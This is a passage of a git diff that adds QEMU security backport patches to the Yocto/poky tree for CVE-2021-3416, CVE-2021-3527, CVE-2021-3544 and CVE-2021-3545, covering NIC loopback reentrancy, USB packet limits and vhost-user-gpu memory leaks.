qemu_net_queue_receive(NetQueue *queue, ++ const uint8_t *data, ++ size_t size) ++{ ++ if (queue->delivering) { ++ return 0; ++ } ++ ++ return qemu_net_queue_deliver(queue, NULL, 0, data, size); ++} ++ ++ssize_t qemu_net_queue_receive_iov(NetQueue *queue, ++ const struct iovec *iov, ++ int iovcnt) ++{ ++ if (queue->delivering) { ++ return 0; ++ } ++ ++ return qemu_net_queue_deliver_iov(queue, NULL, 0, iov, iovcnt); ++} ++ + ssize_t qemu_net_queue_send(NetQueue *queue, + NetClientState *sender, + unsigned flags, +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch new file mode 100644 index 0000000000..fdb4894e44 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_10.patch @@ -0,0 +1,41 @@ +From 65b851efd3d0280425c202f4e5880c48f8334dae Mon Sep 17 00:00:00 2001 +From: Alexander Bulekov <alxndr@bu.edu> +Date: Mon, 1 Mar 2021 14:35:30 -0500 +Subject: [PATCH 10/10] lan9118: switch to use qemu_receive_packet() for + loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com +Signed-off-by: Alexander Bulekov <alxndr@bu.edu> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [37cee01784ff0df13e5209517e1b3594a5e792d1] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/lan9118.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/net/lan9118.c +=================================================================== +--- qemu-4.2.0.orig/hw/net/lan9118.c ++++ qemu-4.2.0/hw/net/lan9118.c +@@ -667,7 +667,7 @@ static void do_tx_packet(lan9118_state * + /* FIXME: Honor TX disable, and allow queueing of packets. */ + if (s->phy_control & 0x4000) { + /* This assumes the receive routine doesn't touch the VLANClient. */ +- lan9118_receive(qemu_get_queue(s->nic), s->txp->data, s->txp->len); ++ qemu_receive_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len); + } else { + qemu_send_packet(qemu_get_queue(s->nic), s->txp->data, s->txp->len); + } diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch new file mode 100644 index 0000000000..5e53e20bac --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_2.patch @@ -0,0 +1,42 @@ +From e2a48a3c7cc33dbbe89f896e0f07462cb04ff6b5 Mon Sep 17 00:00:00 2001 +From: Jason Wang <jasowang@redhat.com> +Date: Wed, 24 Feb 2021 12:13:22 +0800 +Subject: [PATCH 02/10] e1000: switch to use qemu_receive_packet() for loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [1caff0340f49c93d535c6558a5138d20d475315c] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/e1000.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/net/e1000.c b/hw/net/e1000.c +index d7d05ae30..cf22c4f07 100644 +--- a/hw/net/e1000.c ++++ b/hw/net/e1000.c +@@ -546,7 +546,7 @@ e1000_send_packet(E1000State *s, const uint8_t *buf, int size) + + NetClientState *nc = qemu_get_queue(s->nic); + if (s->phy_reg[PHY_CTRL] & MII_CR_LOOPBACK) { +- nc->info->receive(nc, buf, size); ++ qemu_receive_packet(nc, buf, size); + } else { + qemu_send_packet(nc, buf, size); + } +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch new file mode 100644 index 0000000000..3fc469e3e3 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_3.patch @@ -0,0 +1,43 @@ +From c041a4da1ff119715e0ccf2d4a7af62568f17b93 Mon Sep 17 00:00:00 2001 +From: Jason Wang <jasowang@redhat.com> +Date: Wed, 24 Feb 2021 12:57:40 +0800 +Subject: [PATCH 03/10] dp8393x: switch to use qemu_receive_packet() for + loopback packet +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [331d2ac9ea307c990dc86e6493e8f0c48d14bb33] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/dp8393x.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/net/dp8393x.c b/hw/net/dp8393x.c +index 205c0decc..533a8304d 100644 +--- a/hw/net/dp8393x.c ++++ b/hw/net/dp8393x.c +@@ -506,7 +506,7 @@ static void dp8393x_do_transmit_packets(dp8393xState *s) + s->regs[SONIC_TCR] |= SONIC_TCR_CRSL; + if (nc->info->can_receive(nc)) { + s->loopback_packet = 1; +- nc->info->receive(nc, s->tx_buffer, tx_len); ++ qemu_receive_packet(nc, s->tx_buffer, tx_len); + } + } else { + /* Transmit packet */ +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch new file mode 100644 index 0000000000..93202ebcef --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_5.patch @@ -0,0 +1,42 @@ +From d465dc79c9ee729d91ef086b993e956b1935be69 Mon Sep 17 00:00:00 2001 +From: Jason Wang <jasowang@redhat.com> +Date: Wed, 24 Feb 2021 13:14:35 +0800 +Subject: [PATCH 05/10] sungem: switch to use qemu_receive_packet() for + loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Reviewed-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk> +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Reviewed-by: Alistair Francis <alistair.francis@wdc.com> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [8c92060d3c0248bd4d515719a35922cd2391b9b4] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/sungem.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/net/sungem.c +=================================================================== +--- qemu-4.2.0.orig/hw/net/sungem.c ++++ qemu-4.2.0/hw/net/sungem.c +@@ -305,7 +305,7 @@ static void sungem_send_packet(SunGEMSta + NetClientState *nc = qemu_get_queue(s->nic); + + if (s->macregs[MAC_XIFCFG >> 2] & MAC_XIFCFG_LBCK) { +- nc->info->receive(nc, buf, size); ++ qemu_receive_packet(nc, buf, size); + } else { + qemu_send_packet(nc, buf, size); + } diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch new file mode 100644 index 0000000000..40b4bd96e7 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch @@ -0,0 +1,40 @@ +From c0010f9b2bafe866fe32e3c2688454bc24147136 Mon Sep 17 00:00:00 2001 +From: Jason Wang <jasowang@redhat.com> +Date: Wed, 24 Feb 2021 13:27:52 +0800 +Subject: [PATCH 06/10] tx_pkt: switch to use qemu_receive_packet_iov() for + loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_receive_iov() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [8c552542b81e56ff532dd27ec6e5328954bdda73] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/net_tx_pkt.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/net/net_tx_pkt.c +=================================================================== +--- qemu-4.2.0.orig/hw/net/net_tx_pkt.c ++++ qemu-4.2.0/hw/net/net_tx_pkt.c +@@ -544,7 +544,7 @@ static inline void net_tx_pkt_sendv(stru + NetClientState *nc, const struct iovec *iov, int iov_cnt) + { + if (pkt->is_loopback) { +- nc->info->receive_iov(nc, iov, iov_cnt); ++ qemu_receive_packet_iov(nc, iov, iov_cnt); + } else { + qemu_sendv_packet(nc, iov, iov_cnt); + } diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch new file mode 100644 index 0000000000..b3b702cca4 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch @@ -0,0 +1,42 @@ +From 64b38675c728354e4015e4bec3d975cd4cb8a981 Mon Sep 17 00:00:00 2001 +From: Alexander Bulekov <alxndr@bu.edu> +Date: Fri, 26 Feb 2021 13:47:53 -0500 +Subject: [PATCH 07/10] rtl8139: switch to use qemu_receive_packet() for + loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Buglink: https://bugs.launchpad.net/qemu/+bug/1910826 +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com +Signed-off-by: Alexander Bulekov <alxndr@bu.edu> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [5311fb805a4403bba024e83886fa0e7572265de4] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/rtl8139.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/net/rtl8139.c +=================================================================== +--- qemu-4.2.0.orig/hw/net/rtl8139.c ++++ qemu-4.2.0/hw/net/rtl8139.c +@@ -1793,7 +1793,7 @@ static void rtl8139_transfer_frame(RTL81 + } + + DPRINTF("+++ transmit loopback mode\n"); +- rtl8139_do_receive(qemu_get_queue(s->nic), buf, size, do_interrupt); ++ qemu_receive_packet(qemu_get_queue(s->nic), buf, size); + + if (iov) { + g_free(buf2); diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch new file mode 100644 index 0000000000..ed716468dc --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch @@ -0,0 +1,44 @@ +From 023ce62f0a788ad3a8233c7a828554bceeafd031 Mon Sep 17 00:00:00 2001 +From: Alexander Bulekov <alxndr@bu.edu> +Date: Mon, 1 Mar 2021 10:33:34 -0500 +Subject: [PATCH 08/10] pcnet: switch to use qemu_receive_packet() for loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Buglink: https://bugs.launchpad.net/qemu/+bug/1917085 +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com +Signed-off-by: Alexander Bulekov <alxndr@bu.edu> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [99ccfaa1edafd79f7a3a0ff7b58ae4da7c514928] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/pcnet.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/net/pcnet.c b/hw/net/pcnet.c +index f3f18d859..dcd3fc494 100644 +--- a/hw/net/pcnet.c ++++ b/hw/net/pcnet.c +@@ -1250,7 +1250,7 @@ txagain: + if (BCR_SWSTYLE(s) == 1) + add_crc = !GET_FIELD(tmd.status, TMDS, NOFCS); + s->looptest = add_crc ? PCNET_LOOPTEST_CRC : PCNET_LOOPTEST_NOCRC; +- pcnet_receive(qemu_get_queue(s->nic), s->buffer, s->xmit_pos); ++ qemu_receive_packet(qemu_get_queue(s->nic), s->buffer, s->xmit_pos); + s->looptest = 0; + } else { + if (s->nic) { +-- +2.29.2 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch new file mode 100644 index 0000000000..f4a985604e --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch @@ -0,0 +1,41 @@ +From ecf7e62bb2cb02c9bd40082504ae376f3e19ffd2 Mon Sep 17 00:00:00 2001 +From: Alexander Bulekov <alxndr@bu.edu> +Date: Mon, 1 Mar 2021 14:33:43 -0500 +Subject: [PATCH 09/10] cadence_gem: switch to use qemu_receive_packet() for + loopback +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This patch switches to use qemu_receive_packet() which can detect +reentrancy and return early. + +This is intended to address CVE-2021-3416. + +Cc: Prasad J Pandit <ppandit@redhat.com> +Cc: qemu-stable@nongnu.org +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Signed-off-by: Alexander Bulekov <alxndr@bu.edu> +Signed-off-by: Jason Wang <jasowang@redhat.com> + +Upstream-Status: Backport [e73adfbeec9d4e008630c814759052ed945c3fed] +CVE: CVE-2021-3416 + +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/net/cadence_gem.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +Index: qemu-4.2.0/hw/net/cadence_gem.c +=================================================================== +--- qemu-4.2.0.orig/hw/net/cadence_gem.c ++++ qemu-4.2.0/hw/net/cadence_gem.c +@@ -1225,7 +1225,7 @@ static void gem_transmit(CadenceGEMState + /* Send the packet somewhere */ + if (s->phy_loop || (s->regs[GEM_NWCTRL] & + GEM_NWCTRL_LOCALLOOP)) { +- gem_receive(qemu_get_queue(s->nic), tx_packet, ++ qemu_receive_packet(qemu_get_queue(s->nic), tx_packet, + total_bytes); + } else { + qemu_send_packet(qemu_get_queue(s->nic), tx_packet, diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch new file mode 100644 index 0000000000..77a5385692 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch @@ -0,0 +1,42 @@ +From 05a40b172e4d691371534828078be47e7fff524c Mon Sep 17 00:00:00 2001 +From: Gerd Hoffmann <kraxel@redhat.com> +Date: Mon, 3 May 2021 15:29:15 +0200 +Subject: [PATCH] usb: limit combined packets to 1 MiB (CVE-2021-3527) + +usb-host and usb-redirect try to batch bulk transfers by combining many +small usb packets into a single, large transfer request, to reduce the +overhead and improve performance. + +This patch adds a size limit of 1 MiB for those combined packets to +restrict the host resources the guest can bind that way. + +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> +Message-Id: <20210503132915.2335822-6-kraxel@redhat.com> + +Upstream-Status: Backport +https://gitlab.com/qemu-project/qemu/-/commit/05a40b172e4d691371534828078be47e7fff524c +CVE: CVE-2021-3527 +Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> + +--- + hw/usb/combined-packet.c | 4 +++- + 1 file changed, 3 insertions(+), 1 deletion(-) + +diff --git a/hw/usb/combined-packet.c b/hw/usb/combined-packet.c +index 5d57e883dc..e56802f89a 100644 +--- a/hw/usb/combined-packet.c ++++ b/hw/usb/combined-packet.c +@@ -171,7 +171,9 @@ void usb_ep_combine_input_packets(USBEndpoint *ep) + if ((p->iov.size % ep->max_packet_size) != 0 || !p->short_not_ok || + next == NULL || + /* Work around for Linux usbfs bulk splitting + migration */ +- (totalsize == (16 * KiB - 36) && p->int_req)) { ++ (totalsize == (16 * KiB - 36) && p->int_req) || ++ /* Next package may grow combined package over 1MiB */ ++ totalsize > 1 * MiB - ep->max_packet_size) { + usb_device_handle_data(ep->dev, first); + assert(first->status == USB_RET_ASYNC); + if (first->combined) { +-- +GitLab + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch new file mode 100644 index 0000000000..6371aced12 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch @@ -0,0 +1,59 @@ +From 7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986 Mon Sep 17 00:00:00 2001 +From: Gerd Hoffmann <kraxel@redhat.com> +Date: Mon, 3 May 2021 15:29:12 +0200 +Subject: [PATCH] usb/redir: avoid dynamic stack allocation (CVE-2021-3527) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Use autofree heap allocation instead. + +Fixes: 4f4321c11ff ("usb: use iovecs in USBPacket") +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> +Tested-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Message-Id: <20210503132915.2335822-3-kraxel@redhat.com> + +Upstream-Status: Backport +https://gitlab.com/qemu-project/qemu/-/commit/7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986 +CVE: CVE-2021-3527 +Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com> + +--- + hw/usb/redirect.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c +index 17f06f3417..6a75b0dc4a 100644 +--- a/hw/usb/redirect.c ++++ b/hw/usb/redirect.c +@@ -620,7 +620,7 @@ static void usbredir_handle_iso_data(USBRedirDevice *dev, USBPacket *p, + .endpoint = ep, + .length = p->iov.size + }; +- uint8_t buf[p->iov.size]; ++ g_autofree uint8_t *buf = g_malloc(p->iov.size); + /* No id, we look at the ep when receiving a status back */ + usb_packet_copy(p, buf, p->iov.size); + usbredirparser_send_iso_packet(dev->parser, 0, &iso_packet, +@@ -818,7 +818,7 @@ static void usbredir_handle_bulk_data(USBRedirDevice *dev, USBPacket *p, + usbredirparser_send_bulk_packet(dev->parser, p->id, + &bulk_packet, NULL, 0); + } else { +- uint8_t buf[size]; ++ g_autofree uint8_t *buf = g_malloc(size); + usb_packet_copy(p, buf, size); + usbredir_log_data(dev, "bulk data out:", buf, size); + usbredirparser_send_bulk_packet(dev->parser, p->id, +@@ -923,7 +923,7 @@ static void usbredir_handle_interrupt_out_data(USBRedirDevice *dev, + USBPacket *p, uint8_t ep) + { + struct usb_redir_interrupt_packet_header interrupt_packet; +- uint8_t buf[p->iov.size]; ++ g_autofree uint8_t *buf = g_malloc(p->iov.size); + + DPRINTF("interrupt-out ep %02X len %zd id %"PRIu64"\n", ep, + p->iov.size, p->id); +-- +GitLab + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch new file mode 100644 index 0000000000..1b4fcbfb60 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch @@ -0,0 +1,29 @@ +vhost-user-gpu: fix resource leak in 'vg_resource_create_2d' (CVE-2021-3544) + +Call 'vugbm_buffer_destroy' in error path to avoid resource leak. + +Fixes: CVE-2021-3544 +Reported-by: default avatarLi Qiang <liq3ea@163.com> +Reviewed-by: default avatarPrasad J Pandit <pjp@fedoraproject.org> +Signed-off-by: default avatarLi Qiang <liq3ea@163.com> +Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com> +Message-Id: <20210516030403.107723-3-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +[vhost-user-gpu does not exist in 4.2.0] +CVE: CVE-2021-3544 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c +@@ -328,6 +328,7 @@ vg_resource_create_2d(VuGpu *g, + g_critical("%s: resource creation failed %d %d %d", + __func__, c2d.resource_id, c2d.width, c2d.height); + g_free(res); ++ vugbm_buffer_destroy(&res->buffer); + cmd->error = VIRTIO_GPU_RESP_ERR_OUT_OF_MEMORY; + return; + } diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch new file mode 100644 index 0000000000..36cbb127f8 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch @@ -0,0 +1,39 @@ +vhost-user-gpu: fix memory leak in vg_resource_attach_backing (CVE-2021-3544) + + +Check whether the 'res' has already been attach_backing to avoid +memory leak. + +Fixes: CVE-2021-3544 +Reported-by: default avatarLi Qiang <liq3ea@163.com> +virtio-gpu fix: 204f01b3 + + ("virtio-gpu: fix memory leak + in resource attach backing") + Signed-off-by: default avatarLi Qiang <liq3ea@163.com> + Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com> + Message-Id: <20210516030403.107723-4-liq3ea@163.com> + Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +[vhost-user-gpu does not exist in 4.2.0 context] +CVE: CVE-2021-3544 +Signed-off-by: Armin Kuster <akuster@mvista.com> + + +Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c +@@ -468,6 +468,11 @@ vg_resource_attach_backing(VuGpu *g, + return; + } + ++ if (res->iov) { ++ cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC; ++ return; ++ } ++ + ret = vg_create_mapping_iov(g, &ab, cmd, &res->iov); + if (ret != 0) { + cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC; diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch new file mode 100644 index 0000000000..c534f4c24f --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch @@ -0,0 +1,39 @@ +vhost-user-gpu: fix memory leak while calling 'vg_resource_unref' (CVE-2021-3544) + +If the guest trigger following sequences, the attach_backing will be leaked: + +vg_resource_create_2d +vg_resource_attach_backing +vg_resource_unref + +This patch fix this by freeing 'res->iov' in vg_resource_destroy. + +Fixes: CVE-2021-3544 +Reported-by: default avatarLi Qiang <liq3ea@163.com> +virtio-gpu fix: 5e8e3c4c + +("virtio-gpu: fix resource leak +in virgl_cmd_resource_unref") +Reviewed-by: default avatarPrasad J Pandit <pjp@fedoraproject.org> +Signed-off-by: default avatarLi Qiang <liq3ea@163.com> +Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com> +Message-Id: <20210516030403.107723-5-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2021-3544 +[vhost-user-gpu does not exist in the 4.2.0] +Signed-off-by: Armin Kuster <akuster@mvista.com> + +Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c +@@ -379,6 +379,7 @@ vg_resource_destroy(VuGpu *g, + } + + vugbm_buffer_destroy(&res->buffer); ++ g_free(res->iov); + pixman_image_unref(res->image); + QTAILQ_REMOVE(&g->reslist, res, next); + g_free(res); diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch new file mode 100644 index 0000000000..96e36eb854 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch @@ -0,0 +1,46 @@ +vhost-user-gpu: fix memory leak in 'virgl_cmd_resource_unref' (CVE-2021-3544) + +The 'res->iov' will be leaked if the guest trigger following sequences: + +virgl_cmd_create_resource_2d +virgl_resource_attach_backing +virgl_cmd_resource_unref + +This patch fixes this. + +Fixes: CVE-2021-3544 +Reported-by: default avatarLi Qiang <liq3ea@163.com> +virtio-gpu fix: 5e8e3c4c + +("virtio-gpu: fix resource leak +in virgl_cmd_resource_unref" +Signed-off-by: default avatarLi Qiang <liq3ea@163.com> +Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com> +Message-Id: <20210516030403.107723-6-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2021-3544 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +@@ -105,9 +105,16 @@ virgl_cmd_resource_unref(VuGpu *g, + struct virtio_gpu_ctrl_command *cmd) + { + struct virtio_gpu_resource_unref unref; ++ struct iovec *res_iovs = NULL; ++ int num_iovs = 0; + + VUGPU_FILL_CMD(unref); + ++ virgl_renderer_resource_detach_iov(unref.resource_id, ++ &res_iovs, ++ &num_iovs); ++ g_free(res_iovs); ++ + virgl_renderer_resource_unref(unref.resource_id); + } + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch new file mode 100644 index 0000000000..e592ce50e2 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch @@ -0,0 +1,47 @@ +From 63736af5a6571d9def93769431e0d7e38c6677bf Mon Sep 17 00:00:00 2001 +From: Li Qiang <liq3ea@163.com> +Date: Sat, 15 May 2021 20:04:01 -0700 +Subject: [PATCH] vhost-user-gpu: fix memory leak in + 'virgl_resource_attach_backing' (CVE-2021-3544) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +If 'virgl_renderer_resource_attach_iov' failed, the 'res_iovs' will +be leaked. + +Fixes: CVE-2021-3544 +Reported-by: Li Qiang <liq3ea@163.com> +virtio-gpu fix: 33243031da ("virtio-gpu-3d: fix memory leak +in resource attach backing") + +Signed-off-by: Li Qiang <liq3ea@163.com> +Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com> +Message-Id: <20210516030403.107723-7-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2021-3544 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + contrib/vhost-user-gpu/virgl.c | 5 ++++- + 1 file changed, 4 insertions(+), 1 deletion(-) + +Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +@@ -283,8 +283,11 @@ virgl_resource_attach_backing(VuGpu *g, + return; + } + +- virgl_renderer_resource_attach_iov(att_rb.resource_id, ++ ret = virgl_renderer_resource_attach_iov(att_rb.resource_id, + res_iovs, att_rb.nr_entries); ++ if (ret != 0) { ++ g_free(res_iovs); ++ } + } + + static void diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch new file mode 100644 index 0000000000..fcdda64437 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch @@ -0,0 +1,41 @@ +From 121841b25d72d13f8cad554363138c360f1250ea Mon Sep 17 00:00:00 2001 